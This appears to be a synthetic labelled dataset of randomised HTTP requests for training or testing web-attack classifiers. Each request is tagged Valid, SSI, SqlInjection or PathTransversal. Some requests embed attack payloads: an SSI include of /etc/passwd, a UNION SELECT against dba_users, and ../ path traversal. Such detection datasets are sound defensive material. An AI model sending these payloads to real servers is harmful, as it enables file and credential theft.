Accept-Charset: x-mac-icelandic;q=0.7, shift_jis, x-mac-ce, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: sabAoNm-eOs9, Hhaie-Tlezl5m;q=0.2, eeeia-iu2jo
Cache-Control: no-cache
Client-ip: 248.250.7.9
Cookie: Tid7rvr=763;ieoodBkpteu2rOo=eEqiBu;kzntqcnsoeri=77289
Cookie2: $Version="56"
Date: Sat, 28 Feb 09 02:32:09 CET
ETag: W/"OZYuALpI03b7894yF"
Expect: o1sod=hnnle
From: moea@estmzx.uk
If-Modified-Since: Sat, 31 Oct 09 07:40:50 CET
If-Unmodified-Since: Fri, 30 Oct 09 07:14:34 UTC
If-Match: "RpoFUwFtEvhikeFHjp"
If-None-Match: "lZtu6xdASRFJEqGQ"
If-Range: Sun, 05 Jun 05 10:21:32 UTC
Max-Forwards: 053
MIME-Version: 5.3
Pragma: GtaP='E'
Proxy-Authorization: grtfh vrAnop=rgtpedIg
Authorization: Basic MHNvYTppZU5t
Range: 6-6,8373-
Referer: /aZplm/UePnw/draiEdC.bin
TE: gzip;q=0.8,trailers,trailers
Trailer: Date
User-Agent: oqram@l http://www.saewaoE.it
UA-CPU: PowerPC
UA-Disp: 2543,113,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 269x9244
Via: 2.7 www.ipnrmdp.jpeg
Transfer-Encoding: compress
Upgrade: 2eglrr/4.5, A52ic/9.9, ntnlr/5.9, lahWl/8.7
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 209.213.51.4
X-Serial-Number: 7592797493312
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 19707
Start - Id: 14894
class: Valid
GET /fASDeUGQIfdD/otOYys/Slbg/ptdOcdel0inl/9EFtX@9odT1QLw4P/iQULolo84sYUXJN1F/rokGnEzBMP4BZ9U8-.lO/2uJ/SmrwMss7vloeot85hm5/MvO/sZBPmuF-.tiff?6ugFohxaosu=dahperloDenrtuz&yhis=ha%3E%402&nyuqbaNdaconaag=u%25scboot.inirn+Sbuhzhb&JBRucunionreplace=027&kc8dua4fspe=da9namB&tzridAt=cO&qDJorBHIPP__b=%2Fa1&lefoi6s1nChoeho=65aeaegco&d5ECT0uestyle=+7soahgjimgtotth1etcbns3&seneize=resoneboot.iniNs%2B+s&utauds3eebkee=trcp%26u%7EeIbv&rrrelx49osOcns3=on8eooiea4yqml&cdrgroup byyvn52=591&hndWgejEnnreyh=Ina351edleen6&ter=9 HTTP/1.1
Host: 86.156.242.249
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman, utf-8, windows-1250, iso-8859-1;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 199.117.134.44
Cookie: e6ecolhgtctt=  
Cookie2: $Version="82"
Date: Fri, 06 May 05 23:58:53 UTC
ETag: W/"HIwSC0gk7EGhOBTr"
Expect: lziantcs
From: ugwyeac@ddrrnet.uk
If-Modified-Since: Sat, 09 Jun 07 13:53:45 UTC
If-Unmodified-Since: Sat, 24 Apr 04 05:03:02 CET
If-Match: "bENL25l1IoohnsMZ-DJr"
If-None-Match: "NJodSh2fjw0OPDCX"
If-Range: "0lSL7aovVJ428IxIZev"
Max-Forwards: 4792
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM aXhpZXN1ZWdxZXR1OW5lZXJhYWFraVp1dXBzYWhlZG53bGRyb2Zm
Authorization: NTLM Y2llcnNvaXk2b2ZmYjduYm5udEllOHdtZWVVcndoZG9UYWw=
Range: 614-,0-6202
Referer: /tbuE/mew4isl/oeGtua/1jIUbwis/e5TnorNc.conf
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.9 (Machintosh; U; Mac OS X 5.6; cJ-dt; rv:4.6.9) Gecko/41830631
UA-CPU: 68000
UA-Disp: 3105,545,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6967x560
Via: e6eoW/1.6 www.r2iaj.js, 3.5 101.41.6.255, eoou/4.2 www.TBs7sre.html
Transfer-Encoding: enoltt; mlDint=nfjssah
Upgrade: ed3tT/7.9, 3Ifeie/2.1, etw/3.8, thenvr/4.1
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 572302445496
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14894
Start - Id: 5966
class: Valid
POST /saidtsuozruwasldte.bin? HTTP/1.1
Content-Length: 100
Content-Language: teOlMehX,G2Nusaso
Content-Encoding: deflate
Content-Location: /oEssgIe/srrx/LshnoOo/tAe4d/duir.fgf
Content-MD5: YW9ueHQ5b2lpaGljZHR1cg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Mar 05 17:10:46 UTC
Last-Modified: Thu, 10 Mar 05 14:56:30 UTC
Host: 250.184.100.78
Connection: st9tyg
Accept: video/*, audio/x-wav;q=0.0, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rzLeyrar-icqoEufh;q=0.4, yt-a;q=0.3, u-fdCler;q=0.6, R6djii-e2;q=0.1
Cache-Control: i2ncgoao=ablsue1e
Client-ip: 148.96.53.107
Cookie: -uT.nmxp_RvtE=ooaltbdngo1sametaecopyo
Cookie2: $Version="5"
Date: Thu, 29 Apr 10 11:12:22 UTC
ETag: "_.Q2-F1w679-be4v"
Expect: 100-continue
From: teaboao@c5yaZsajI5.fr
If-Modified-Since: Thu, 01 Jul 04 04:33:53 GMT
If-Unmodified-Since: Tue, 08 Apr 08 03:20:01 GMT
If-Match: *
If-None-Match: "McNrh@sQLelzFRMuAcQa"
If-Range: Tue, 16 Feb 10 21:17:38 CET
Max-Forwards: 4952
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: xmqC 4sHflt=ecg4xa
Authorization: Digest algorithm=MD5
Range: 7772-71595
Referer: http://www.taaapan.st/xurgconl/mchgd/reldna/renfta/Ibi8gnse.cgi
TE: trailers,trailers
Trailer: If-Range
User-Agent: ehoptaj4tyyleyyeit
UA-CPU: StrongARM
UA-Disp: 834,6780,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 666x9191
Via: 4.3 www.waer9.css
Transfer-Encoding: tcri; foazzre=iiyTespi
Upgrade: treana/1.3, oher5/3.1
Warning: 116 www.AsB4fE.css "ceGyewiRcegeii" "Mon, 10 Aug 09 03:15:41 CET"
X-Forwarded-For: 248.70.206.255
X-Serial-Number: 840738575772869612
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6nit6eyt=2823109169&vmhiotrpedw6=metas |8tloAUts&zCgetc=9987411619&FnG1rdiv=eJN-6mrw&6s1tcIml=8430

End - Id: 5966
Start - Id: 39677
class: SSI
GET /tBlr4f5WvtPyU/eqeBCGizte/pa/eX52NTh9ZZ/t2ed7hbAen/xn53axhmms78RSv.ksf/lmx4QhnKGwEG.swf?FEXakdl=9&.rMbn=35&a6.tT%uP9rha8=ot&mipparu7TTnhoa=ewuo7od4cosTtsrc1&ee=negxT&hclNroek0hyma=%3C%21--%23include++virtual%3D%22%2Fetc%2Fpasswd%22+--%3E&oZOdskFph=7330138&cajnrtzGdav=1091308&lngAtilina=lw%3Ea&lahlmfcm2V7ae=i&inTlescadparr=i0a4f9&W1ouL=392&se=599766 HTTP/1.0
Host: 86.246.162.44
Connection: close
Accept: */*;q=0.8
Accept-Charset: cp-950;q=0.7, windows-1255;q=0.5
Accept-Encoding: *
Accept-Language: dtogfrnq-Rr;q=0.1
Cache-Control: inietit=Hrgo
Client-ip: 17.56.25.243
Cookie: aoodqrhaTs=6384
Cookie2: $Version="57"
Date: Sat, 30 Jul 05 16:52:22 CET
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: odEootep@ltmngy.biz
If-Modified-Since: Sat, 23 Dec 06 07:02:01 UTC
If-Unmodified-Since: Fri, 10 Aug 07 19:14:21 CET
If-Match: *
If-None-Match: *
If-Range: "xK1saFgGulzrQ2lzG4D4"
Max-Forwards: 7
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM eGVkdGNhbzJhc2l3dHBjcGF0cndpcmMxdHNldGx1ZTBxZXRSbHVl
Authorization: Digest nc=bfF4DAEf
Range: 047-,52-2392,30343-939979
Referer: http://ecrz.st/eten.tiff
TE: chunked;q=0.7,chunked;q=0.4
Trailer: If-Range
User-Agent: aobyir3nredfFtgAex
UA-CPU: 68000
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: HTTP/6.5 www.eehma.html:0137, enr/2.5 www.ojn7cmy.htm
Transfer-Encoding: gzip
Upgrade: id8d/1.6, amqh/8.3, de3ts/9.5, se7lsr/8.4
Warning: 733 214.19.169.247 "I5ohianit" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39677
Start - Id: 42620
class: SqlInjection
GET /sbLzd0hehmrLhhmti/hkNyHVrZNuBevF/i05/httpsfA_KtUixS/mdeeonewarln2ua7d/g5@oc/dXwGEqz11K.shtml?ysVtn=ao1halhitn&and=oeiNbtwinnts+ezsam+h&2sz=chairs%27++UNION+SELECT++++ckrsps+++FROM++dba_users++++WHERE++++name+++++like+%27%2525&xhaNsieait4it7o=87&e4s=fSa&nt=2Dt&oeotuXdkUbtIdr=59324747&ddk=%5BanlOyee&firoeHejnarn=fwh%273d+%5CrnmaC&L.VZ5DDopen=tdJ&wdVFpassthrusoZI=s1replace HTTP/1.1
Host: 29.24.118.209
Connection: nsoenn
Accept: image/*
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.2, compress, identity, identity;q=0.6
Accept-Language: IeDwru-m2, uoaitms-3iom;q=0.8, r1naddlh-itn2yott, s-cx
Cache-Control: max-age=5
Client-ip: 59.30.97.76
Cookie: VG=522330;siaUxqNe=312
Cookie2: $Version="942"
Date: Sat, 10 May 08 15:32:22 GMT
ETag: W/"FXXTyG49LAn3eWm@Zb"
Expect: 100-continue
From: auoiBfre@itih.st
If-Modified-Since: Tue, 07 Sep 04 07:11:15 UTC
If-Unmodified-Since: Thu, 03 May 07 21:53:39 CET
If-Match: *
If-None-Match: "ztuighI.OW0wgbl6ZpEm"
If-Range: "k_s3mn@WlgTRkLRoAi_"
Max-Forwards: 45
MIME-Version: 0.0
Pragma: Utne='qoowHten'
Proxy-Authorization: nsid 7qtm9a4=e6osh
Authorization: NTLM b1VzYXNkY2FUNHRhdGhlc3llb3VzdG9hMWVTYWVpbndu
Referer: /lvetnm.nsf
TE: trailers,gzip
Trailer: Cache-Control
User-Agent: Mozilla/2.6 (Windows; U; Win98 5.1; dw-be; rv:5.4.0) Gecko/67915899
UA-CPU: x86
UA-Disp: 4133,8176,16
UA-OS: Mac OS X
UA-Pixels: 4720x346
Via: HTTP/9.2 www.Enistre.shtml, jth/5.6 www.03mp.png, 1.6 www.wiu0n.gif
Transfer-Encoding: oethN; Sk2exwoe=n1um
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 152480656582
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 42620
Start - Id: 31747
class: Valid
GET /zbHd/6kh.png?sinedsiNgep=2TFUJFlP1H HTTP/1.0
Host: 87.165.114.3
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: macintosh, euc-cn, windows-1253;q=0.3, windows-1251;q=0.4, us-ascii;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 223.17.42.199
Cookie: enqed75ui=rlibscrn9"E\lH"cat0aend;pwsf5er4leTsIy=331552684;mTcfon2PNLE=go j Rsn
Cookie2: $Version="50"
Date: Sun, 30 Jan 05 17:12:02 UTC
ETag: W/"N3pXuj9hycE3itDq"
Expect: stto
From: Bll8es@eijtedl.gov
If-Modified-Since: Fri, 05 Feb 10 17:58:55 UTC
If-Unmodified-Since: Mon, 28 Jun 04 10:29:30 GMT
If-Match: *
If-None-Match: "VwkEoijK6@et.1Y"
If-Range: *
Max-Forwards: 1
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic cmVjcmV3aGU6bnNmcmU2
Authorization: Basic bW5paDo1c3R1
Range: -93338,-076631
Referer: /og3ihef/aynsr.tiff
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: hsredfEthcinudt54e
UA-CPU: Sparc
UA-Disp: 574,324,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0437x4847
Via: HTTP/0.7 212.82.230.235
Transfer-Encoding: Omags
Upgrade: Nesagu/1.4
Warning: 258 205.103.201.129 "eaie" 
X-Forwarded-For: 78.110.85.184
X-Serial-Number: 48619214669
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31747
Start - Id: 12721
class: Valid
GET /tbL2c3@x5Pk/i9IV1R/6zJT3V/trdT6Y/qhoJ5cs4.jpg?ehofaxaw7h=k3TCTtsglacebr5r&T-ybCX-CACe=ga%5D%3D&wCduatq=6&mqnn=oc%285nbssystem HTTP/1.0
Host: www.nahtlooh6.uk
Connection: keep-alive
Accept: application/rtf, application/*
Accept-Charset: iso-8859-8-i, ks_c_5601-1987, iso-8859-4
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 93.60.208.57
Cookie: hxp_ndelete7ZnpM=37
Cookie2: $Version="08"
Date: Sat, 22 Jan 05 12:51:27 CET
ETag: W/"COn6ArBuYK0fndCL"
Expect: 100-continue
From: Stwoo@9oieten.net
If-Modified-Since: Sat, 15 Mar 08 12:52:40 UTC
If-Unmodified-Since: Sat, 08 Oct 05 24:12:20 UTC
If-Match: "F4Lsa8L0KvHF0j8Eo"
If-None-Match: "6xKty7IIJikI@9XBXH"
If-Range: "S0qNeue1Irgr.JN"
Max-Forwards: 21
MIME-Version: 4.0
Pragma: a=b
Proxy-Authorization: Digest username="ixSSh"
Authorization: e5rYKt Rh9tn=cioT5src
Range: 9092-,513-7
Referer: http://www.Uaywtn.it/n2tt.zip
TE: chunked;q=0.7
Trailer: Date
User-Agent: ohitj (eed02R; u87howp.Gc; oLAVX.7)
UA-CPU: Sparc
UA-Disp: 753,2579,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 780x3609
Via: HTTP/2.9 222.107.208.194:8, 8.9 220.43.2.10:8451, 4.2 www.0dspKte.jpeg:7834
Transfer-Encoding: compress
Upgrade: aao1rt/4.8, oho4/0.3, ln3tas/2.5
Warning: 519 www.i2r8.gif "skiorrwarhldUtb" 
X-Forwarded-For: 227.241.172.23
X-Serial-Number: 91220427481224
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12721
Start - Id: 5922
class: Valid
PUT /5HZtFSVcQ/34tfegtqeuveB/4tdasrggcemo.htm? HTTP/1.0
Content-Length: 55
Content-Language: tutaea,OlsUaac
Content-Encoding: gzip
Content-Location: /izqOh/4lswir8l.pl
Content-MD5: czhyaHRlYmFhaWdzNGFveQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Mar 08 19:17:37 GMT
Last-Modified: Mon, 01 Jan 07 09:14:14 GMT
Host: www.0ttdewjetA.net
Connection: cAxI8I5
Accept: */*;q=0.1
Accept-Charset: windows-1253;q=0.5, iso-2022-jp, x-mac-ce
Accept-Encoding: identity, deflate;q=0.6
Accept-Language: os-szsh, sm1n-Oozutea;q=0.4, eo-g9eeaxn;q=0.1, ht55cne-e8p5b
Cache-Control: no-transform
Client-ip: 89.28.24.225
Cookie: ryhehlAde=ee&+systemna\4nfaer;tNav=1tmetdm5rjccWle9E;Nbrtydme=nWZky;TiaieOnnkaiEwx=789;sB.4M=eCy;e71lrekith0nr=csn EYs
Cookie2: $Version="567"
Date: Sun, 03 Jun 07 21:55:19 CET
ETag: W/"6gSWAW_cdI7UAz0O"
Expect: brrcfr=ileAr;ohgl=iazsL
From: tioopae@jUht.st
If-Modified-Since: Wed, 15 Oct 08 05:11:06 GMT
If-Unmodified-Since: Sat, 24 Nov 07 12:03:21 GMT
If-Match: "o1iDQyfS__HwWNpN0"
If-None-Match: *
If-Range: Mon, 08 Aug 05 04:20:27 UTC
Max-Forwards: 3
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM MGVhZWFtbzVmTnNvYnpsaHluZWVyaGNmWDhVZW1zc2VxdGFhZXVjZmVycm5lYnVo
Range: 536946-,605-,-0
Referer: /rp5be/nsonEtr/thhsei/iolf/rrtvwF.css
TE: chunked,trailers,gzip
Trailer: Accept-Encoding
User-Agent: nceIbey (21t2muL)
UA-CPU: PowerPC
UA-Disp: 860,981,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2011x601
Via: teah8d/7.3 168.152.240.67
Transfer-Encoding: Rr5n; rso8at=Dnagaq
Upgrade: rct1/3.4, bcattq/1.0, ipaQo/9.6, n3hhl/7.2, nSfe/9.3
Warning: 697 185.37.75.36 "rRncnh" 
X-Forwarded-For: 81.125.98.15
X-Serial-Number: 673720584538972
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

v0o7pmgth==a&slkitsssBuiR=tbin1v &auc=tcl&dpic=$%

End - Id: 5922
Start - Id: 4973
class: Valid
PUT /45endteaorndxzCtgvpe/oa3wi.png? HTTP/1.0
Content-Length: 205
Content-Language: ddne8,Nswfdlp
Content-Encoding: compress
Content-Location: http://www.anen.st/erupnjc/Oylfna/l5g7.cfm
Content-MD5: YWh2d3J0ZHR0YWVpZmVwaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Mar 07 20:07:20 CET
Last-Modified: Wed, 22 Apr 09 17:01:21 GMT
Host: 2.65.127.78
Connection: h9amc
Accept: text/xml;q=0.6
Accept-Charset: iso-8859-7, windows-1254, windows-1255, x-mac-arabic;q=0.0
Accept-Encoding: *
Accept-Language: hirr-hfiasYI, todsir1g-otnrN, saw6TEua-c, l-hssRVowl;q=0.8, yiioatnf-Tis;q=0.2
Cache-Control: no-store
Client-ip: 9.237.108.60
Cookie: El7Z=tnntxp_ishutdownl16d
Cookie2: $Version="1"
Date: Tue, 22 Jul 08 05:09:14 UTC
ETag: W/".RVg91q.nGCx@5v"
Expect: 100-continue
From: zqhtasa7@rsaljt.it
If-Modified-Since: Mon, 10 Nov 08 07:40:03 GMT
If-Unmodified-Since: Sun, 15 May 05 02:59:59 UTC
If-Match: "VICg9GeUTr_-2wH"
If-None-Match: "fDkoDgN2U8Ysp9ED3"
If-Range: Wed, 03 Dec 08 04:11:13 UTC
Max-Forwards: 9
MIME-Version: 8.6
Pragma: nuiea='rstn'
Proxy-Authorization: NTLM eWxvbHNtZTZJYklvZXRuN3lyNkhyemF3ZXN3RWVkdGJqM3NrZzNl
Authorization: NTLM Zm5ldHN4YnNtaXVudDVjaGdOZlRkZW1zYWlyY2d3ZW5yZWw=
Range: 500-
Referer: http://Tpe71.de/0Iloiym.mpeg
TE: deflate;q=0.5
Trailer: From
User-Agent: tE6giil5giph4xreeda
UA-CPU: Sparc
UA-Disp: 1425,8375,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 527x0259
Via: FTP/8.8 189.58.243.138:5
Transfer-Encoding: iechsi
Upgrade: 2tkN/0.3, i2absA/1.0, acAai/6.3, dhvEm/4.4, os7/0.6
Warning: 173 28.187.74.144 "intyt8" "Wed, 16 Jan 08 01:05:54 UTC"
X-Forwarded-For: 26.142.203.81
X-Serial-Number: 3100317318115604683
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Oram1taroc=omhormh6ha=ipen&weerouaa=emPJYTjv-R&syEmb=rv0sDs&Nselect-M5exec=8Ss-ne iyeso&enT57eo4bwo=n5c$jr%ot&xlsturepehcgic=ss:i%&arixejt60bttt=G>r&atst=9912462&nfuen= ti9\:gyobjectit >v

End - Id: 4973
Start - Id: 26120
class: Valid
GET /iyYtEhM/eos5ltvtfnt1/rGPIe4t3@/eDea/osiecsgi6weysa/nK5JaiaFbx2V.png?mea=97888&oXhtlat=13&othi=hecopyt&otoha=23ax-bYmXb&rndtxrnsu0cW=currroegu%5D1%3Ao%7Ea0emhn HTTP/1.1
Host: www.N2s38rNue.st
Connection: close
Accept: video/quicktime;q=0.6, video/*
Accept-Charset: windows-874, cp-950;q=0.5, hz-gb-2312;q=0.0, windows-874, euc-kr;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 195.55.9.34
Cookie: ded3sheugcns=an2E;ntawdmrteakj=mxlNR7J;3qS0Ks_-Fn_1=-bt;4oamodnss7ta3j=olZmautie7toy0t;ee0n8fnndH=4iin;aibntw=ouEGS0x11gX
Cookie2: $Version="23"
Date: Fri, 31 Oct 08 04:04:58 GMT
ETag: W/"_Hoe4u81Pkw7Zoq3BCsA"
Expect: 100-continue
From: fOetgzSe@nnraa.com
If-Modified-Since: Wed, 13 Aug 08 19:50:41 GMT
If-Unmodified-Since: Tue, 23 Sep 08 09:09:48 UTC
If-Match: "3Lrl3STN9a42BwOxwf7"
If-None-Match: "Vzdxw.nQDghs0fa"
If-Range: Tue, 17 Nov 09 21:56:37 UTC
Max-Forwards: 403
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM YXN6Z3poUm95b290N2xyZ2htdXJ2b2hleXFpb3VydGVjcmxmbnQ=
Authorization: zs1x 4rAceew=tFhtus
Range: -076,520453-4710
Referer: /oenqdone/e1dg/thsn.php4
TE: gzip;q=0.4,gzip;q=0.2,trailers
Trailer: If-Range
User-Agent: e1aMwe2tC4/5.3.5.3
UA-CPU: Sparc
UA-Disp: 5226,2357,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 619x684
Via: 1.2 24.46.28.229, HTTP/9.7 48.247.131.89
Transfer-Encoding: compress
Upgrade: nim/0.5, 3tts/3.5
Warning: 803 211.131.116.100 "tisise5eslK" "Tue, 29 Dec 09 16:59:21 UTC"
X-Forwarded-For: 38.148.116.46
X-Serial-Number: 53458755873406066083
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 26120
Start - Id: 19086
class: Valid
GET /a4ieOlu/b9ecainea8tegePssfeY/uo4d6x9.asp? HTTP/1.0
Host: www.riFel4tZ.biz:80
Connection: omK0U
Accept: video/quicktime;q=0.6, text/html;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: it-ydl, snn-iitmcec, Aeae57mr-r7aea, eaver-sStenp;q=0.2, kEe1ci-aeo;q=0.7
Cache-Control: no-cache
Client-ip: 68.198.225.114
Cookie: rtns=190575;ns2qs97alotSia=Zant39ptYdlianqY;qy9gir75m=Stebxf;gtn=1033025;fmych=tttlietgiESgnzs;qoHJa=cbRpsh1-rl iObwwinnt91h
Cookie2: $Version="843"
Date: Mon, 23 Aug 04 18:31:29 GMT
ETag: W/"ybTiqqPUXJhv01KIDA9"
Expect: r1Defz
From: nun9o@s8ehqoner.cz
If-Modified-Since: Tue, 16 Jun 09 14:39:26 GMT
If-Unmodified-Since: Sat, 15 Sep 07 02:55:47 CET
If-Match: "6oL5TR6NgVL8IywW6Kw"
If-None-Match: "rrpjPDvzOdQgst@h"
If-Range: *
Max-Forwards: 089
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: e8w3T rr26=fpTqfott
Authorization: Digest realm
Range: 2-4,83-,-0
Referer: /Anep/sv2n.gif
TE: trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/0.7 (compatible; Udey; Open BSD i586; iTre0ah; teeBtnth; eeh4veasy)
UA-CPU: x86
UA-Disp: 603,8155,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 019x039
Via: HTTP/1.9 www.hpaNuub.gif, 2.1 102.122.7.12, n3edzr/2.4 88.74.187.240
Transfer-Encoding: gzip
Upgrade: mTec5/5.9, iRo/8.2, 5e5e/7.4
Warning: 769 www.ynfoTewU.png "tyneuSih9ho" 
X-Forwarded-For: 203.182.207.188
X-Serial-Number: 594077
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19086
Start - Id: 22102
class: Valid
GET /QaYC13DJL/dMOKAOJuichRvP/nntnrioirotreige/eZ7voFba/eastb/tmpzE.C.html?diniteIgtza4=9i&ITEmet=nYWjUmE_YH3 HTTP/1.0
Host: www.36Nqloeizb.uk:62
Connection: tohtdr
Accept: */*;q=0.4
Accept-Charset: windows-1255, euc-cn
Accept-Encoding: 
Accept-Language: 0qnao-sp0oa3s, c3s-es5;q=0.9
Cache-Control: min-fresh=337
Client-ip: 12.17.95.95
Cookie: vClnodeL= tetFi;._IU=);T3W1V=a0nihd4;miesiaus3rce=rj9h3QRqc
Cookie2: $Version="28"
Date: Sat, 11 Nov 06 16:20:26 UTC
ETag: W/"lYWZyNUWq8@aWk_jMrW"
Expect: raried
From: dren@Ttoersyr6.com
If-Modified-Since: Mon, 29 Aug 05 08:07:11 GMT
If-Unmodified-Since: Fri, 14 Aug 09 14:29:14 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Oct 09 15:56:32 UTC
Max-Forwards: 1
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic aWFydHA6ZmVjaWM=
Authorization: 0oitr oaVg=n4Wm
Range: -212,11-,-0
Referer: http://www.seamuojd.be/ehkEd4/nIseeso.txt
TE: trailers,deflate;q=0.0
Trailer: Proxy-Authorization
User-Agent: s7Hxjl http://www.q5sohrie.com
UA-CPU: StrongARM
UA-Disp: 1342,370,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8724x0388
Via: 6.4 17.74.34.133, 8.9 107.172.180.50, HTTP/4.5 245.221.253.150
Transfer-Encoding: deflate
Upgrade: sdqs/1.2, otap/2.3, suO/8.6, t03/1.8
Warning: 503 www.atcO.png "aniinsIheewgiof" 
X-Forwarded-For: 223.155.250.69
X-Serial-Number: 42920569636252963929
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22102
Start - Id: 9849
class: Valid
GET /hlOQlIvs/eQuBRjyMs6vE31hgnG/geXspm/YkPTWAdkSW4P.0ap/brgetotea0iIiAohe/eowinErndlm/mrpassthruP/03wqcmd38T39-Bh.html?hI2=qedegOtnkn&o9roil5uegemd=%3Bmochar%5Cqiframe0dPrit9lru&ssreswera=ae_wDv2&leissrhfpao=479870369&hp1dhS7v=7661 HTTP/1.1
Host: 140.199.3.167:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a-riiso2;q=0.1, v-smoh;q=0.6, uftRnq-nn
Cache-Control: only-if-cached
Client-ip: 169.231.157.95
Cookie: emrpaosnaxweyos=4;dnthod9=r2ejamly|metao8>hlikehE&t;nhfe=ga;oETejbnf=boot.iniesall Nvbscriptaeio;sdi9llto=scic0d$0
Cookie2: $Version="4"
Date: Mon, 20 Mar 06 18:44:13 UTC
ETag: W/"FEztyvw35iAewNuw"
Expect: 100-continue
From: eiuie74@cpahSn6aa.fr
If-Modified-Since: Sat, 12 Nov 05 05:22:35 UTC
If-Unmodified-Since: Wed, 20 May 09 01:00:20 UTC
If-Match: "8w_QWhcoK44kwXZ"
If-None-Match: "7-jXS.3TdSM28QlKOox8"
If-Range: *
Max-Forwards: 92
MIME-Version: 3.5
Pragma: deztueh='bo'
Proxy-Authorization: Basic aXMwZW5ibmU6ZW9pZWhnNA==
Authorization: NTLM MHNzb3htbm9IZzdlaXNmZXRyZTBoYWVzbG5jbGVzaHNvNHBzdjVv
Range: -820868
Referer: http://Oo6sEn.com/s1uua/riwbso.php
TE: gzip;q=0.7,trailers
Trailer: If-None-Match
User-Agent: hhvbroosOO/4.6.1.5
UA-CPU: 68000
UA-Disp: 9520,7570,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 803x940
Via: HTTP/2.1 www.1sg2art.css:089, FTP/8.2 103.86.125.138
Transfer-Encoding: identity
Upgrade: eact/5.3, ysq5t/7.8, xiaj/8.2, eite/8.6
Warning: 359 www.omvimkcn.html "tdHnehjio" 
X-Forwarded-For: 12.7.147.127
X-Serial-Number: 09946739061718
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9849
Start - Id: 44974
class: PathTransversal
GET /t138uVXNiGVmp7Spe/ebogtr1etfkr/eef/qieohaeitaauratny/qpDtkHE_HNXEaFtN-ypL/k91INdiP-Bl/eP3Ky39.cfm?Jbvxix2luJ=.%2F..%2F.%2F..%2F.%2F..%2F.%2F..%2F&4chaoiegpo3n=nph-3cbadxorinhtaccesa&opttp4yllndohdo=h HTTP/1.0
Host: www.tpedteroox.biz
Connection: close
Accept: */*;q=0.6
Accept-Charset: euc-kr, cp-936, x-mac-chinesesimp
Accept-Encoding: gzip;q=0.4, gzip, identity;q=0.9, gzip;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 81.141.204.248
Cookie: faaxnoe=071977;Rrs=110580;sel=11714
Cookie2: $Version="998"
Date: Mon, 01 Jun 09 02:57:20 UTC
ETag: W/"olNjm62@_Zy7aV.QSeHA"
Expect: awgewyl
From: 3srmpro4@bnhd9wr.de
